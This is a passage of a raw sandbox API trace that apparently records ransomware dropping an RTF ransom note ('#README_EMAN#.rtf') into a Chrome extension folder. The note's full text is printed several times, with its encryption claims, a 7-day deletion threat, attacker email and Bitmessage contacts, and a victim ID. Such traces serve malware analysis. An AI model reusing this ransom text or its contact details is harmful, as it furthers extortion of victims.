rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x83\x19", lpUsedDefaultChar=0x0) returned 8717 [0289.345] WriteFile (in: hFile=0x2e8, lpBuffer=0x2373dc8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2373dc8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.346] CloseHandle (hObject=0x2e8) returned 1 [0289.346] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\#readme_eman#.rtf")) returned 0xffffffff [0289.346] GetLastError () returned 0x2 [0289.346] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.347] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.349] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.349] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24647a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 